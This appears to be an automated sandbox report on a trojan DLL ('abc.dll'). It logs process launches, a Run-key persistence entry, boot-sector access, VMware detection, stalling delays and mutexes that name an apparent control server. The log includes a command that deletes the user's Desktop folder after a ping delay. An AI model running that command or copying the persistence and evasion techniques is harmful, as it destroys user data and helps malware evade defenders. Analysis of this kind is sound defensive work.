Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,InputFile
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,PrintFile
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 736
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",Dispatch
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",InputFile
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",PrintFile
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 732
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\abc.dll",Dispatch
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\abc.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,Dispatch	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,InputFile	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,PrintFile	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",Dispatch	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",InputFile	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",PrintFile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\abc.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100042A2 LookupPrivilegeValueA,AdjustTokenPrivileges,	4_2_100042A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1000404F AdjustTokenPrivileges,	4_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_1000404F AdjustTokenPrivileges,	12_2_1000404F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_1000404F AdjustTokenPrivileges,	18_2_1000404F

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Users\user\Desktop\12071239

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER8259.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@41/11@54/7

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10003FB7 CreateToolhelp32Snapshot,

4_2_10003FB7

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,Dispatch

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3440:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1844:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\107.163.56.251:6658
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2224:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\0x5d65r455f
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4912
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\M107.163.56.251:6658
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:468:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4620

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_0137E433 pushad ; ret	1_2_0137E44C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_0137CF30 push eax; iretd	1_2_0137CF35
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_0137C8F8 pushad ; iretd	1_2_0137C8F9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_0137C8C2 push eax; iretd	1_2_0137C8E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1003EEEF pushfd ; mov dword ptr [esp], 17E8F454h	4_2_1003EEFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002D004 push dword ptr [esp+50h]; retn 0054h	4_2_1002D01E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002D021 push dword ptr [esp+38h]; retn 0040h	4_2_1002D038
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002D02C push dword ptr [esp+38h]; retn 0040h	4_2_1002D038
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10039035 push dword ptr [esp+2Ch]; retn 0030h	4_2_1003904E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10027057 push dword ptr [esp+38h]; retn 003Ch	4_2_1003BC33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002F059 push dword ptr [esp+48h]; retn 004Ch	4_2_1002F06E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10043069 pushad ; mov dword ptr [esp], ebx	4_2_1003825D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1003F072 push dword ptr [esp+2Ch]; retn 0034h	4_2_1003F07B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10029075 push dword ptr [esp+40h]; retn 0044h	4_2_10032078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002B08E push dword ptr [esp+4Ch]; retn 0050h	4_2_1002B0C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1001F093 pushfd ; mov dword ptr [esp], ecx	4_2_1001F097
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1003B095 push dword ptr [esp+30h]; retn 0034h	4_2_1003B0B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002709C push dword ptr [esp+44h]; retn 004Ch	4_2_100410EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100210BB push ebx; mov dword ptr [esp], esi	4_2_100210D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100210BB push dword ptr [esp+28h]; retn 002Ch	4_2_100210FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100210BB push dword ptr [esp+44h]; retn 0048h	4_2_10031D0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100250BC push dword ptr [esp+4Ch]; retn 0050h	4_2_100250E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100270CC push dword ptr [esp+24h]; retn 0028h	4_2_1002B355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100390CD push esp; mov dword ptr [esp], esp	4_2_100390E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002B0D0 push dword ptr [esp+40h]; retn 0044h	4_2_10032078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002B0D0 push dword ptr [esp+30h]; retn 0034h	4_2_10037F52
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100230E0 push dword ptr [esp]; mov dword ptr [esp], ECCABD13h	4_2_1002310C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100230E0 push dword ptr [esp+4Ch]; retn 0050h	4_2_10023118
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_100290F2 push dword ptr [esp+40h]; retn 0044h	4_2_10029117
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_10041100 push dword ptr [esp+38h]; retn 003Ch	4_2_10041123
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_1002110B push dword ptr [esp+44h]; retn 0048h	4_2_1002112D

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_026E0E83 LoadLibraryA,GetProcAddress,

4_2_026E0E83

Source: initial sample

Static PE information: section where entry point is pointing to: .rsrc

Source: abc.dll

Static PE information: real checksum: 0x3d1e7 should be: 0x397f3

Source: initial sample

Static PE information: section name: .text entropy: 7.99891570226

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: DeviceIoControl, \\.\PHYSICALDRIVE%d

4_2_10008B8B

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\SysWOW64\rundll32.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Disp

Jump to behavior

Contains functionality to infect the boot sector

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: DeviceIoControl, \\.\PHYSICALDRIVE%d

4_2_10008B8B

Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Disp			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Disp			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_4-17086

Found stalling execution ending in API Sleep call

Source: C:\Windows\SysWOW64\rundll32.exe

Stalling execution: Execution stalls by calling Sleep

graph_4-16695

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 1800000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 502			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 536			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.1 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.1 %

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_10007F89 FindFirstFileA,FindNextFileA,

4_2_10007F89

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 1800000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 3600000	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_4-17028
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_4-16997
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_5-346
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_5-385
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_12-16377
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_16-360
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_16-346
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_18-16375

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\microsoft.system.package.metadata\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\WindowsApps\Deleted\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\AppTiles\	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.BingWeather_4.22.3254.0_neutral_split.scale-150_8wekyb3d8bbwe\	Jump to behavior

Source: Amcache.hve.15.dr	Binary or memory string: VMware
Source: Amcache.hve.15.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: rundll32.exe, 00000004.00000002.772606981.000000000029B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: s\Applications\\VMwareHo
Source: Amcache.hve.15.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual USB Mouse
Source: rundll32.exe, 00000004.00000003.312083245.0000000002707000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: y\Machine\Software\Classes\Applications\\VMwareHostOpen.exes\Applications\\VMwareHostOpen.exeion\\Run\User Shell Foldersockdown_Zones\4
Source: Amcache.hve.15.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.15.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
